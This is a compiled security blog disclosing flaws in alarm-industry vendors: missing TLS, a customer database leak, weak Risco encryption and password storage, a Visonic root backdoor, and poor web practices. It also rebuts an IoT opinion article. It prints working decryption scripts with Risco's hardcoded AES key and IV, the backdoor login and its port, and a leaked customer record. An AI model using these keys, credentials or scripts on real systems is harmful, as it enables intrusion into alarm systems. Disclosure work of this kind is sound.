CSL Dualcom installer shop not protected by TLS

CSL Dualcom operate an installer shop which is used to order Dualcom units. This handles personal information, including a username and password.

The site is not protected by TLS at all. Credentials and any other data will be sent in the plain over the Internet.

This is not acceptable in 2015.

This was reported to CSL in June 2014.


As of 14/11/2015, the site now uses TLS and is configured correctly. Why was this not done before? Why did it take exposing it on a blog to happen?

CSL Dualcom Gemini Cisco VPN endpoint vulnerable to POODLE attack

CSL Dualcom use Cisco VPN software to connect to their management platform, Gemini.

The server that does this is listed as https://cslvpn.cslconnect.com/

On inspection with the SSL Labs test, there are configuration issues with the TLS on this server, giving it a grade of F.

This includes vulnerability to the POODLE attack.

This was fixed a long time ago by Cisco.

Note that, as per the SSLLabs test, this is not the only issue.


As of 14/11/2015, the POODLE vulnerability has been closed. Again, you need to ask why this wasn’t picked up.


Customer database leak on CSL Dualcom’s SIM registration portal

CSL Dualcom sell SIMs for M2M purposes. They need to be registered on their website.

This website is http://m2mconnect.csldual.com/SignUp – firstly note how this does not have TLS. This is not excusable in 2015.

On browsing the site, it was noted that the search string was limited to 3 or more characters using client-side Javascript.

Using the site with Javascript turned off allowed a zero-length search to be submitted. Initially this appeared to cause the request to freeze. However, on waiting ~10 minutes, it became apparent that an empty search had returned every single record from the database – several megabytes of data.
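Client-side Javascript checks are trivially bypassed, so the same rule has to be enforced on the server. A sketch of the missing server-side validation (hypothetical names, in Python 3):

```python
def validate_search(query, min_length=3):
    """Server-side guard: client-side Javascript checks can simply be
    switched off, so never rely on them alone."""
    query = (query or "").strip()
    if len(query) < min_length:
        raise ValueError("Search term must be at least %d characters" % min_length)
    return query
```

Had a check like this existed on the server, the zero-length search would have been rejected regardless of what the browser allowed.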

All the companies

Through the UI this just appeared to be company name, town and postcode. However, inspection of the traffic showed that a massive JSON structure had been downloaded, including a company ID, “UniqueCode”, email address and often mobile number.

{"InstallerCompanyID":"327398f6-431b-4495-8193-96789ecbe2bd","CompanyName":"Minster Alarms","ContactName":"Minster Alarms","PostCode":"YO32 9NQ","Town":"York","UniqueCode":134265,"Accreditation":"NSI","AddressOne":"Suncliffe House","AddressTwo":"New Lane, Huntington","County":"","Country":"UK","CountryId":0,"CurrencyId":0,"Email":"info@minsteralarms.co.uk","Mobile":""}

On clicking the company name, a list of users was returned, including personal email addresses, phone numbers and usernames:


These issues were reported to CSL Dualcom on 1st May. The issues were acknowledged on the 3rd May and fixed on the 4th by limiting the fields available.

During the leak, over 5,700 companies' details were available. It was confirmed that some of these had never registered SIMs, so it is likely to be the full CSL customer database.

6 months on, the registration site is still using HTTP.


Vulnerability in Risco Lightsys protocol encryption

During a routine pen-test of an alarm receiving centre, a piece of software was found that was used to remotely configure Risco alarms.

This software communicates with alarm panels, sometimes over IP, sometimes over a mobile network. One of these panels is the Lightsys panel, which seems fairly common in the UK.

The encryption used by this protocol is token at best, and not suitable for securing communication across an untrusted network.

The protocol generates a pseudo-random sequence of numbers using a basic function. This is then XORed with the message to encrypt or decrypt.

Each panel has a “seed” that changes the encryption slightly. Because there is a partially known plaintext, you don’t need to know the seed to decrypt messages – it can simply be determined. The seed tended to be the same across many panels.

numTable = [2, 4, 16, 32768]
PRNG_output = []

# This is the "Remote ID code" in the software
seed = 2

for i in range(0,255):
    bit = 0

    for j in range(0, 4):
        if (seed & numTable[j]) > 0:
            bit ^= 1

    seed = seed << 1 | bit
    PRNG_output.append(seed & 255)

# This has been captured from the network by tricking software into encrypting
# Message is 02RMT=1234 8EBC
# 02 is sequence number
# RMT is a command
# 1234 is the access code
msg = '353945620a804bc6dbe4b67ac0495503'.decode('hex')

plain = ''

for i in range(0, len(msg)):
    plain += chr(ord(msg[i]) ^ PRNG_output[i])

print "Decrypted message: %s" % plain
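Because the keystream comes from such a weak generator, and every message starts with a known structure (a two-digit sequence number and a command such as RMT), the seed can be recovered by brute force in well under a second. A Python 3 sketch of the idea – function names are mine, not Risco's:

```python
def keystream(seed, length):
    """Reproduce the panel's weak keystream generator shown above."""
    taps = [2, 4, 16, 32768]
    out = []
    for _ in range(length):
        bit = 0
        for mask in taps:
            if seed & mask:
                bit ^= 1
        seed = (seed << 1) | bit
        out.append(seed & 0xFF)
    return out

def xor(data, ks):
    """XOR a byte string against the keystream (encrypts and decrypts)."""
    return bytes(b ^ k for b, k in zip(data, ks))

def recover_seeds(ciphertext, known_prefix, max_seed=0x10000):
    """Try every 16-bit seed and keep those that decrypt the start of
    the message to the known plaintext prefix."""
    n = len(known_prefix)
    return [s for s in range(max_seed)
            if xor(ciphertext[:n], keystream(s, n)) == known_prefix]
```

Six known bytes are usually enough to narrow the candidates to a handful, which can then be confirmed against the rest of the message.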

A further proof of concept was developed that can send and receive commands with alarms, leading to a denial-of-service condition. I am not disclosing this as it can cause harm and is not the root cause of the problem.

This was reported to Risco on 7th August. As yet, they have not indicated whether they wish to fix this issue.


  • Don’t roll your own encryption
  • If you have a key, make sure it has enough length to actually improve security

Open Risco support portal including private FTP credentials

During a routine pen-test of an alarm receiving centre, I was googling for default usernames and passwords of Risco software and alarms.

When doing this, I found an abandoned support portal “Riscopedia” which contained a number of valid credentials for FTP sites, along with other private documentation.


Whilst the Technical.Notes account appears to be shut down, there are still paths onto other FTP servers that look like they should be closed.

This was reported to Risco on 30th July via Twitter and email.


Backdoor root account on Visonic Powerlink 2 modules

During a routine pen-test of an alarm receiving centre, a repository of manufacturer firmware was found. This is often quite hard to get hold of, and I welcomed the opportunity to reverse some of these.

The Visonic Powerlink 2 firmware stood out due to its large size – this was almost certainly an embedded Linux system.

On unpacking the firmware, it was found that the units had an enabled account with root privileges called root2 with the password visonic. I discovered this by cracking the password file. However, once I had done this, someone pointed out that this was widely documented as early as 2011.

The system runs telnet on port 7523, and a web interface on port 80. Shodan has ~85 of these visible at the moment.

Once you have root access, you can arm and disarm the connected alarm, and capture images from any connected cameras.

In addition to this, for the firmware and single unit I was permitted access to, it was found it was transmitting status messages (armed/disarmed status, serial number) over a plaintext connection to http://myhome.visonic.com/. We could not find anywhere in the firmware to turn this off.

These units would be an ideal pivot or persistence node in a longer-term pen-test.




Vulnerability in password storage in Risco Configuration Software

During a routine pen-test of an alarm receiving centre, a piece of software was found that was used to remotely configure Risco alarms.

The software is backed by a SQL database called “ConfigurationSoftware” which contains a table called ut_Users with a column called PWD which stores passwords for users that can log into the system.

This PWD field appeared to be a base64 encoded string.

On further investigation, this password was stored in an encrypted form. This allows it to be recovered from the software, and doesn’t follow best practices of hashing passwords.

The encryption is AES-256 and uses a fixed key and IV which is hardcoded into the application.

Passwords were recovered from the database which, due to password re-use, allowed me to take control of the company's domain controller and website. The password was of good complexity, so if hashing had been used, I would have been unlikely to recover it.

A Python script to decrypt the passwords is shown below.

from Crypto.Cipher import AES
import base64

BS = 32
# PKCS #7
pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS)
unpad = lambda s : s[0:-ord(s[-1])]

def encrypt(raw, key, iv ):
    raw = pad(raw)
    cipher = AES.new(key, AES.MODE_CBC, iv)
    return (cipher.encrypt(raw ))

def decrypt(enc, key, iv ):
    cipher = AES.new(key, AES.MODE_CBC, iv)
    return unpad(cipher.decrypt(enc))

# Static and hardcoded
key = 'FKLe608FDsF5J6ZaKpTghjED7Hb80ALq'
iv = 'Sckt6DopykVCD9Lq'

# The default 123 password as installed
ciphertext = 'BQqwo4a87TvfJKv4af8h3g=='

print 'Password is %s' % decrypt(base64.b64decode(ciphertext), key, iv).decode('utf-16-le')

This was reported to Risco on 7th August. A fix is meant to be deployed at the beginning of November.


  • Hash, don’t encrypt your passwords.
  • Don’t hardcode encryption keys in your software
  • Don’t use the same password for domain admin as in a system of unknown quality
  • Have a security contact so it’s not painful to report issues

Terrible website security on www.apprentices4fs.com

Companies in the physical security world often seem to have awful virtual security.

This site – “Apprentices for Fire & Security” – is a prime example of absolutely awful virtual security. And once again, these are not subtle issues – they are indicative of incompetent developers working on the security aspects of a website. Stop entrusting your security to people who do not know what they are doing.

Let us go through the obvious issues:

No HTTPS anywhere

The site handles passwords, emails, addresses, names, CVs, job postings. This is confidential information.

None of this is protected by HTTPS. It is all sent in the plain.

This is not forgivable in 2015. It is embarrassing that anyone can deploy a site handling logins and CVs without it.

Update: as of mid-morning 9/11, HTTPS has been turned on for apprentices4fs.com and some other domains. You have to ask, why was this not done in the first place?

Passwords are emailed to users

When you set up your account, you choose a password. This password is immediately emailed to you.

This means that your password has now been sent in the plain across the Internet.

This is not good practice for very obvious reasons.

Passwords are stored in the plain

When you fill in the password reminder, your original password is emailed to you. This means the passwords are not hashed.

This means that if the database was to leak, it would reveal all the passwords.

This is terrible practice and it is widely known that it is terrible practice.

Passwords are truncated

Enter a 100-character password, and send a password reminder. The plain-text password returned is now only 20 characters long.

This is a side effect of plain text password storage. If you store the password in the plain, you have to limit the password length to something. If you hash the password, the password could be “War & Peace” and the hash would still be of a fixed length.
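The fixed-length point is easy to demonstrate. A quick Python 3 sketch using a plain SHA-256 digest for illustration (a real system should use a slow, salted scheme such as bcrypt or scrypt, not a bare hash):

```python
import hashlib

# A short password and an absurdly long one.
short = hashlib.sha256(b"hunter2").hexdigest()
long_ = hashlib.sha256(("War & Peace " * 10000).encode()).hexdigest()

# Both digests are 64 hex characters regardless of input length,
# so there is never a storage reason to truncate a password.
print(len(short), len(long_))  # → 64 64
```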

This is terrible practice.

Passwords are not case sensitive

If you set your password to AAAAAA, you can login to the system with aaaaaa.

Even if you are using plain text storage, you don’t need to do this.

This massively reduces the number of different passwords available.

This is terrible practice.

Detailed error logging is turned on

If an error occurs, you are given a detailed error log.

This leaks information such as the directory structure, what attack mitigation rules are in place and so on. Sometimes these error logs can even leak things like usernames and passwords.

They should be turned off on a production server. This is web admin 101.

Open redirect on login form

Often when you access a page that requires authentication, a site will pass a referrer (i.e. the page you were on) to the login page. This is so you are seamlessly returned to the page you wanted to access after logging in.

It’s absolutely vital that this referrer URL is not a free choice.

Why? Picture this attack.

The attacker sends this URL to the victim:


The victim logs in to the real site, and are redirected to the attacker’s fake login page. This fake page says that the victim has entered their password incorrectly.

The victim logs in again. His credentials are stored by the attacker, and he is returned to the genuine site.

This is a glaringly obvious issue and very serious.
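The fix is to treat the return URL as untrusted input and accept only local paths. A sketch of the kind of check that blocks the attack above – illustrative only, not the site's actual code:

```python
from urllib.parse import urlparse

def safe_redirect_target(url, default="/"):
    """Only allow relative paths on this site; anything carrying a
    scheme or a host is rejected and replaced with the default."""
    parsed = urlparse(url)
    if parsed.scheme or parsed.netloc:
        return default
    # Reject protocol-relative forms like //evil.example too.
    if not parsed.path.startswith("/") or parsed.path.startswith("//"):
        return default
    return url
```

With this in place, a login link pointing at an attacker's domain silently falls back to the site's own front page.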

No protection against cross-site request forgery

There is no evidence of any protection against cross-site request forgery (CSRF). This includes pages used to change passwords and other details.

Cross-site request forgery means I can send a crafted link to a user (e.g. by email), and if they click on the link, the action will be carried out as the user.

A very simple example would be something like:


And the logged in user would have their password changed to ABCDEF.

The actual mechanics are more complex than this. Regardless, you cannot deploy a public facing website dealing with logins or confidential information without CSRF protection.
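The standard defence is a random per-session token that must accompany every state-changing request – something an attacker crafting a link cannot know. A minimal Python 3 sketch of the idea (names are mine):

```python
import hmac
import secrets

def issue_csrf_token(session):
    """Store a random token in the server-side session; the same value
    is embedded in a hidden field of every form."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token

def check_csrf_token(session, submitted):
    """Reject the request unless the submitted token matches.
    compare_digest avoids leaking the token via timing."""
    expected = session.get("csrf_token", "")
    return bool(expected) and hmac.compare_digest(expected, submitted)
```

A forged link or auto-submitting form from another site has no way to include the right token, so the password-change request is refused.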

Cookies don’t have the HTTPOnly flag set.

Cookies are used to remember that you are logged into a site using something called a session token. If you get hold of someone else’s session token, you can act as if you were logged in as them.

A common attack is to steal a cookie by making the browser run malicious Javascript (exploiting a vulnerability called XSS) that sends the cookie to an attacker.

The HTTPOnly flag prevents Javascript from reading the cookie. It makes stealing the cookie much harder. Above all, nearly all of the time there is no penalty to setting it – it has no downsides.

Again, this is basic stuff.
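Setting the flag is one line in any framework; at the HTTP level it is just an attribute on the Set-Cookie header. A quick sketch using Python's standard library:

```python
from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie["session"] = "abc123"
cookie["session"]["httponly"] = True  # deny Javascript access to the cookie
cookie["session"]["secure"] = True    # only ever send it over HTTPS

# Produces a Set-Cookie header carrying both flags.
header = cookie.output()
print(header)
```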

An arsehole security warning

Do anything they don’t like, and you get this (the page has since been changed to return a 403).

There’s a strong correlation, in my experience, between OTT warnings like this and incompetence.

Overzealous XSS filters

It’s vital you protect your site from an attack called XSS, where an attacker tries to inject their own JavaScript into your pages.

There are a number of ways of doing this. You can detect basic attempts and warn the user that there is an issue, probably logging the issue and alerting admins. If there is a persistent and realistic threat, start banning IPs.

Immediately locking the IP out and issuing a ridiculous warning is not how to do XSS protection.

Visit the search page and search for <script>. Or just click here to do it for you. Be warned you will be banned from the site.

This has since been hidden, but someone had kindly screenshotted it:


In my experience of looking at over 100 sites, the ones that react to XSS like this tend to have wholly ineffective XSS filters – they only deal with the very obvious, and can be subverted. It’s like putting up a “Warning – Guard Dogs” sign, without the guard dogs.

Totally ineffective banning

If you trigger the overzealous XSS filters, you are banned. Or so it says.

That is, unless you use another browser. Or just manually change the user agent.

I suspect they have done this because otherwise you could easily perform a denial-of-service attack by getting many IPs banned.

This banning is token at best, and provides no extra security.

No security contact

Well, no contact at all. What do you have to do to get these people to respond to a security issue?


The security of this site is about as bad as it can get without just leaving everything in the open. There has been little to no regard to the security of the data or users. This is to the level that it is either extreme incompetence or negligence.

What is more worrying is that the people who developed this sell it as a product.

And, of course, who is behind this particular site? CSL Dualcom.


99 other sites running software by the same company.


  • Forwarding Jobs – Freight and Logistic Jobs
  • Home | Dove Partnership
  • CRA Consulting | Legal & Financial Recruitment Agency | Sheffield
  • Home Page
  • KBB recruitment

They have 99 problems, but their HTTPS configuration isn’t one, because they don’t use it.

Why you shouldn’t listen to Pat Burns on LinkedIn

An article entitled “Why The Internet of Things and the Cloud Should Break Up” showed up on Reddit and Twitter earlier this week. It sounded promising – I’m a proponent of decoupling IoT systems so that they don’t rely on the cloud, even if they still use the cloud most of the time. What I was greeted with was a terrible opinion piece, full of misinformation.

I don’t know where to start, it’s so bad.

A FitBit wristband connects via Bluetooth with your smartphone but sends your activity data to a FitBit cloud app. Does your personal health data really need to sit in the cloud or can you extract sufficient value from it by simply keeping the data stored locally on your smartphone?

This isn’t the IoT. That’s a Bluetooth device connecting to a phone. He seems to be one of those people who will call anything that is connected, but is not a full-blown computer, “IoT”.

For most of the IT industry — let’s just get this on the table — the cloud today is the hammer and there’s almost nothing that isn’t a nail. And the cloud is an easy place to build an IoT application and operates without the messy hassles of embedded software, endpoint security, FCC regulations, or fertility risks, to name a few.

Firstly, using the cloud generally means adding functionality to endpoints. Take a standard IP camera, accepting connections on port 80, using port-forwarding for remote access. Add cloud functionality to allow remote streaming and the system takes more time to develop. It is not a freebie.

Secondly, using the cloud normally makes endpoint security much less of an issue. Traditional architectures, such as port-forwarding to devices, or customers running their own infrastructure, involve inbound connections to your network and endpoints. Many cloud connected devices have absolutely no ports open at all – SmartThings v2 hub for example. Because of this, endpoint security becomes a lot less difficult.

Thirdly, regardless of your architecture, if you want to use wireless connectivity, you need to deal with RF. I don’t see how the cloud avoids this.

It’s cheap and everywhere. Like beer in your dorm, the cloud today is so popular and so well-capitalized that infecting the IoT was only a matter of when, not if. Spin-offs like cloud analytics or cloud perimeter security (no laughing!) are simply too affordable and too visible to pass up. Traditional enterprise IoT pilots that used to cost $250,000 in enterprise software and systems integration services can be executed at a fraction of this price now due to the cloud.

Developing and operating robust, secure cloud systems adds cost and complexity. People are not doing it to avoid cost.

Tools. Compared to older desktop-based tools, cloud-based environments and API’s are vastly simpler to use and integrate while offering robust functionality.

He seems to be conflating using a cloud-based development environment with operating in the cloud. Nearly all cloud based solutions need significant development in traditional languages, on a desktop. It’s not point and click.

Weak endpoints and edges. Endpoints that don’t do analytics, support real-time queries, or even support full two-way messaging tend to spew data remorselessly to an edge router and/or the cloud. Bluetooth, ZigBee, 6lowPAN, and others are all guilty as charged and as a result, they end up driving their users to the cloud.

He seems to have a bee in his bonnet about how “stealthy” wireless protocols are. There really is no link between the wireless protocol used and how much data ends up getting sent to the cloud. They are different layers – one a transport protocol, the other application. Zigbee does send a fair amount of beacon traffic, but none of this ends up outside the PAN. If your app sends a lot of traffic over Zigbee and then your gateway sends it to the cloud, that is not the fault of Zigbee.

It’s not secure. This one is hard to overstate as crummy IoT security is the sordid “yeah, but” in so many discussions about the IoT. IDC predicts that nearly every IT network will have an IoT security breach by the end of 2016 and IT departments are in full freakout mode now. Endpoint security is comically bad and compounded with a hacker-friendly cloud, what could go wrong?

There is absolutely nothing inherent in the cloud architecture that makes it insecure. In fact, there can be a lot of advantages:

  • Endpoints no longer need to accept any incoming connections
  • Endpoints and gateways accept no user-input, massively simplifying design of secure interfaces
  • Connecting to a central point facilitates use of IDS, a skilled operations team, and regular centralised updates

Equally, there is nothing inherent in a cloud architecture that means the endpoints are insecure. An insecure endpoint will be insecure regardless of the architecture.

It’s not real-time. IoT apps that require real-time responses can’t tolerate the extra seconds or minutes required for a cloud lookup.

and later:

Waiting 2–3 minutes for a cloud app to make time for you is a non-starter.

This is just pure misinformation. Going over the Internet adds latency. It doesn’t add “2-3 minutes”, it adds milliseconds typically. 2-3 minutes means the system has been designed badly, and this would be an issue regardless of where it operates.

It may not be faithful. The integrity of your data in the cloud is only as good as the people and systems hosting it. Sensors in your manufacturing facility in Taipei showing you running at 50% below your normal run rate or showing a supply chain hiccup? Hedge funds and competitors enjoy learning about this kind thing!

The integrity of your data on your self-hosted platform is only as good as the people and systems hosting it. Again, nothing inherent about cloud. I would rather have a skilled operations team managing intrusion detection, performance monitoring and disaster recovery than burden a sysadmin with yet another system in-house.

Getting out may be easier than getting in. Once you’ve married a cloud service, how easy will it be to disengage/migrate to another solution at some future date? Is standardization and interoperability in a state that will increase the risk of vendor lock-in? What if the cloud vendor is bought by your competitor and changes policies?

Which is equally true of any bought-in platform. Just remove the word “cloud” from the above paragraph. Vendor lock-in is real however.

A new golden rule of IoT network design is to store sensor data as close as possible to its point of origin and limit its sharing across the network unless absolutely necessary.

You can’t just invent golden rules. Many people want low-cost, low-power endpoints with no storage and no persistence, pushing everything to more powerful gateways or servers. The AWS and Azure IoT platforms both accommodate this. This is Pat Burns’ golden rule, invented to sell his product.

The endpoint is key to the golden rule. Better processors, cheaper memory, and better networking stacks from companies like Haystack are evolving endpoints from dumb terminals to independent, distributed computing devices with real-time query (think Google for the IoT) and NoSQL-like filesystem support. Endpoint-centric designs also have the bonus of being more stealthy and secure, faster, cheaper, and better stewards of battery life and wireless bandwidth. In short, good IoT network design should begin with the endpoint in mind and “dumb” endpoint technologies that beacon or create unnecessary security risks should be phased out

I just don’t know where to begin on this.

The enemy of security is complexity. Are you actually trying to argue that having hundreds of endpoints in a distributed network, able to store data and be queried, are going to be more secure than, say, a memory-based RFID tag? Or a transmit-only 8-bit PIC based humidity sensor?

How are these endpoints cheaper?

What is his issue with beacons and stealth? Well – it’s lucky there is another article – “A Simple Proposal To Improve Security for the Internet of Things” to help us demolish yet another series of misconceptions and misinformation.

Almost every IoT security breach in recent news can be traced to the poor architecture of the wireless protocol used by the device.

No, no they can’t.

Firstly, that is very, very specific. “Poor architecture of the wireless protocol”. Not “Weak implementation of the wireless protocol” or “devices using wireless protocols”.

Secondly, neither of the links provided are breaches. A breach is the result of a system being exploited. One is information leakage, the other is a report of a vulnerability.

Thirdly, the Jeep hack was nothing to do with the wireless protocol. Jeeps could be using wired Ethernet and the same issues would have been present.

Fourthly, nearly every IoT breach in recent news has been carried out over the Internet, not via local attacks on the wireless protocol. There is a lot of research into wireless security, and there is a lot of noise at conferences, but the bulk of issues occur remotely over the Internet. Hackers are not sat outside homes and businesses cracking your Zigbee or wireless burglar alarm.

Avoiding or minimizing the chances of unauthorized discovery is not technically difficult. But today’s IoT technologies like Bluetooth, 6lowpan, Sigfox, LoRaWAN, and others make unauthorized discovery very easy and it creates the worst kind of angst in IT departments.

Most of the protocols make discovery easy because it is intentional. They layer security with discoverability, enabling systems which people can actually use and are actually deployed (unlike Dash7).

The link doesn’t support that unauthorised discovery is causing angst in IT departments. He seems to often do this – provide a link which is vaguely related but doesn’t support the argument. It would be fair to say “IoT is causing angst in IT departments”.

Most wireless IoT technologies were originally conceived as ways to stream large files (Bluetooth, WiFi) while some were designed to be “lighter” versions of WiFi (e.g., ZigBee). Today they are being re-positioned as “IoT” technologies and security, to put it nicely, is an afterthought. Oh yes — some have tried to “layer on” security and may profess to support encryption

Layering encryption onto a transport protocol is completely valid. It’s widely acknowledged that ZigBee, Z-Wave and WiFi, if implemented correctly, are secure against the risk profile involved. Skilled hackers are not sat outside your house, waiting for you to pair your Hue bulbs to the hub so they can grab the keys. It is not happening. Even if they did, all they can do is turn your lights on and off.

I have no idea why he says they only “profess” to support encryption. They all offer encryption. WPA2 is actually a very secure protocol.

hacks for all of these technologies are quite public yet fundamentally traceable to one original sin:

these wireless IoT technologies don’t know how to keep quiet.

What? What hacks of wireless protocols can be traced to not keeping quiet?

More recently, drones are being used to hunt for ZigBee-based endpoints, giving bad actors an easy way to discover, map, and hack ZigBee endpoints:

No, drones are being used to map Zigbee broadcast traffic. This is not enabling anyone to hack Zigbee any more than putting your house number on the door enables someone to pick your locks.

this type of hack provides all sorts of information about each endpoint, including manufacturer ID.

This is not a hack.

This need to be “discoverable” — and this is not limited to ZigBee, Bluetooth or WiFi but to most wireless IoT technologies — requires a near-constant advertising of a device’s presence, leading to any number of “disaster scenarios” that others have extensively written about.

The link, again, doesn’t support that a wireless protocol being discoverable will lead to any disaster scenario. Just pile the links on and hope no one checks.

There is no technical reason that the Internet of Things cannot embrace silence, or stealth as I prefer to call it, as a first principle of endpoint security. Stealth is not a silver bullet for IoT security (there is no silver bullet) and stealth alone won’t protect a network from intrusions, but dollar-for-dollar, stealth is the simplest, cheapest, and most effective form of IoT security protection available.

There is, quite literally, nothing to support this position.

An endpoint, receiving and sending plaintext, unauthenticated commands and data, will not see a noticeable improvement in security. Passive monitoring of the channel will still leak data, and active tampering will cause havoc. The stealth must be broken for the device to send, and this can be seen.

An endpoint, receiving and sending encrypted, authenticated commands and data, will not see a noticeable improvement in security. The data is still encrypted. Unauthenticated commands won’t be carried out.

This is just garbage.

Dollar for dollar, it might be worth making your nodes quieter, but not at the cost of switching from a widely adopted, widely inspected wireless standard to Dash7.

He tries to explain why:

Cloaking. It is harder to discover, hack, spoof, and/or “stalk” an endpoint if a hacker cannot locate the endpoint.

Endpoints need to send. Being stealthy can reduce the traffic but there will still be traffic. Stealth is only a weak layer of security through obscurity.

Googling the IoT. Stealth enables real-time queries of endpoints, a la Google search that non-stealthy endpoints can’t support. Stealth also enables fast queries (<2 seconds) in environments with thousands of endpoints, in turn enabling big data analytics at the true edge of the network.

This has absolutely nothing to do with how stealthy communications from the node are. If you enable your node to be queried, it can be queried. In fact, querying and accessing data at the edge of a network almost negates attempts at being stealthy, as you will see an increase in complex and important traffic on the wireless network.

Minimize interference. Less data being transmitted minimizes the opportunities for interference and failed message transmissions. Contrast this with the tragedy of the commons at 2.45 GHz, where WiFi, ZigBee, microwave ovens, and other countless other technologies engage in wireless gladiatorial combat and cause too many customers to return their IoT gadgets because they “don’t work”.

Again, this has very little to do with stealth. 434MHz – which Dash7 uses – has as many issues with contention as 2.4GHz. In the UK, there are many more poor-quality, untested, non-standards-compliant transmitters in the 434MHz band than there are on 2.4GHz.

Access control. Stealthy endpoints make it easier to control access to the endpoint by limiting who can query the endpoint.

Again, absolutely no link between stealth and access control. If you limit access to something, you limit access to it.

Storage. Less data being transmitted reduces storage costs. Storage vendors, on the other hand, love the non-stealthy IoT status quo.

Again, what? If your endpoint decides to ditch data, then your cloud can also decide to ditch data. This has nothing to do with stealth of the wireless protocol – it’s about volume of data at the application layer.

At this point, I’m bored of this. These articles are utter crap.




InSecurTek Monitoring


The director of IT from Securtek got in touch via the contact form. They are working to fix these issues, and his response was measured and reasonable, especially in light of my rather inflammatory blog post.

Thank you for bringing this to our attention.  We will be taking steps immediately to correct this situation, both in the short-term and in the long-term.
– Bryan Watson, Director of IT, SecurTek Monitoring Solutions


Another security industry website, another slew of basic mistakes.

SecurTek are a Canadian company who offer alarm monitoring. Even just a cursory glance at their system shows that they are ignoring basic security principles.


The login page is lacking HTTPS. There is no excuse for this in 2015 for a commercial web service of any form.



Username enumeration

The login form responds differently depending on whether or not the user exists.

Username not found


This might seem minor, but it massively facilitates brute-forcing usernames and passwords by removing one of the unknowns. Best practice is to indicate that you have entered an incorrect username or password.
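The fix is trivial: both failure paths return an identical message. A sketch (plain-text comparison shown only for brevity – real code compares hashes):

```python
def check_login(users, username, password):
    """Return the same error whether the username or the password is
    wrong, so an attacker cannot confirm which usernames exist."""
    stored = users.get(username)
    if stored is None or stored != password:
        return "Incorrect username or password."
    return "OK"
```

Ideally the timing of the two failure paths should also match, so response times don't leak what the message no longer does.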

Passwords are stored in the plain

The forgotten password functionality simply emails you the password you have already set.

Password in the plain


This has several implications.

It means that your password is stored in a way in which it can be retrieved. Whilst it may be encrypted, this encryption can be reversed, yielding the password. This is not good and nowhere near best practice. Passwords should be hashed at the bare minimum, which prevents them being recovered in this way.

Email is not a secure way of delivering a password. There is the potential for many people to see this password. With password re-use being common, obtaining the password for SecurTek could yield access to many other systems. A password reset mechanism should use a random token and be time-limited.
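A sane reset flow never needs the stored password at all: it emails a single-use, random, time-limited token instead. A Python 3 sketch of the idea (names and the TTL are mine):

```python
import secrets
import time

RESET_TTL = 3600  # hypothetical one-hour validity window

def create_reset_token(store, username):
    """Generate an unguessable token and record who it belongs to
    and when it expires."""
    token = secrets.token_urlsafe(32)
    store[token] = (username, time.time() + RESET_TTL)
    return token

def redeem_reset_token(store, token):
    """Single use: the token is removed whether or not it has expired.
    Returns the username on success, None otherwise."""
    username, expires = store.pop(token, (None, 0.0))
    if username is None or time.time() > expires:
        return None
    return username
```

Even if the email is intercepted, the attacker gets a short-lived token rather than the user's actual (and probably re-used) password.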


This is a 2-minute glance at security, and it has shown two very serious issues and one reasonably serious one. They aren’t subtle issues.

Would you trust a company with your alarm monitoring if they can’t do these things right?